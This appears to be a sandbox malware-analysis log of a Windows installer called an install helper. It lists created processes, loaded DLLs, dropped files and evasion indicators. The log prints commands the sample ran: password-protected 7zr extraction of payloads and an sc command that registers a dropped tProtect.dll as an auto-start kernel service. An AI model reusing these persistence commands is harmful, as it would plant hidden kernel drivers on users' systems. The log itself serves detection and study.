Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Static file information: File size 5695204 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1817031002.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1817308914.0000000003690000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount 10_2_006257D0
Source: update.vac.1.dr | Static PE information: real checksum: 0x0 should be: 0x376862
Source: updat4.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x376862
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x376862
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Static PE information: real checksum: 0x0 should be: 0x576c76
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x34399d
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x34399d
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.1.dr | Static PE information: section name: .00cfg
Source: update.vac.1.dr | Static PE information: section name: .voltbl
Source: update.vac.1.dr | Static PE information: section name: .j)q
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .j)q
Source: is-U9N4C.tmp.6.dr | Static PE information: section name: .xdata
Source: updat4.vac.6.dr | Static PE information: section name: .00cfg
Source: updat4.vac.6.dr | Static PE information: section name: .voltbl
Source: updat4.vac.6.dr | Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD0750B push ecx; ret 6_2_6CD0751E
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CBB0F00 push ss; retn 0001h 6_2_6CBB0F0A
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CDD4F10 push eax; ret 6_2_6CDD4F2E
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD399F4 push 004AC35Ch; ret 6_2_6CD39A0E
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CDD5290 push eax; ret 6_2_6CDD52BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_005A45F4 push 0064C35Ch; ret 10_2_005A460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0063FB10 push eax; ret 10_2_0063FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0063FE90 push eax; ret 10_2_0063FEBE
Source: update.vac.1.dr | Static PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.6.dr | Static PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.6.dr | Static PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | File created: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | File created: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\is-U9N4C.tmp
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\updat4.vac
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\updat4.vac
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4297
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5542
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Window / User API: threadDelayed 544
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Window / User API: threadDelayed 539
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Window / User API: threadDelayed 537
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
